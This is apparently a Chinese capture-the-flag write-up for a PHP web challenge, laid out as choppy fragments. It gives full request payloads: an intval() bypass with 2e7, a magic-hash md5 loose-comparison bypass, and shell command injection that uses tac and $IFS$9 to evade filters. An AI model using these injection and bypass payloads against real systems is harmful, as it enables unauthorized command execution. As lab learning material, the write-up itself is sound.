Hack me
,查看源码也是啥也没有,就用御剑扫一下robots.txt
文件/fAke_f1agggg.php
/fl4g.php
,打开看看
num
,要满足intval($num) < 2020 && intval($num + 1) > 2021
,那么intval()
这个函数是什么:
num=2e7
进行绕过$md5==md5($md5)
,让一个数MD5加密后还是和加密前相等,这也就在网上找到了这个的数0e215962017
num=2e7&md5=0e215962017
get_flag
,不能含有空格
,而且cat
会被wctf2020
替代,那么还是ls
一下num=2e7&md5=0e215962017&get_flag=ls
tac
来代替cat
,用$IFS$9
来代替空格num=2e7&md5=0e215962017&get_flag=tac$IFS$9fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag